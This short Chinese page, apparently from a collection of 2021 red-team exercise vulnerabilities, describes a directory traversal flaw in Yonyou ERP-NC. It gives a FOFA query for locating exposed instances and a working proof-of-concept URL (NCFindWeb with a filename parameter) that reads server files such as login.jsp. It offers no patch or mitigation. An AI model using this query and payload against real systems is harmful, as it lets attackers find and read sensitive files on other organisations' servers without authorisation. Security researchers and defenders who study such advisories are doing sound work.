⽤友ERP-NC ⽬录遍历漏洞

0x01 漏洞描述

⽤友ERP-NC 存在⽬录遍历漏洞，攻击者可以通过⽬录遍历获取敏感⽂件信息

0x02 漏洞影响

⽤友ERP-NC

0x03 FOFA

app="⽤友-UFIDA-NC"

0x04 漏洞复现

POC为：
/NCFindWeb?service=IPreAlertConfigService&filename=

https://ip/NCFindWeb?service=IPreAlertConfigService&filename=login.jsp

Previous2021 年护网漏洞 Next2021HW期间公布的部分漏洞及利用方式（部分附POC、EXP）

Last updated 4 years ago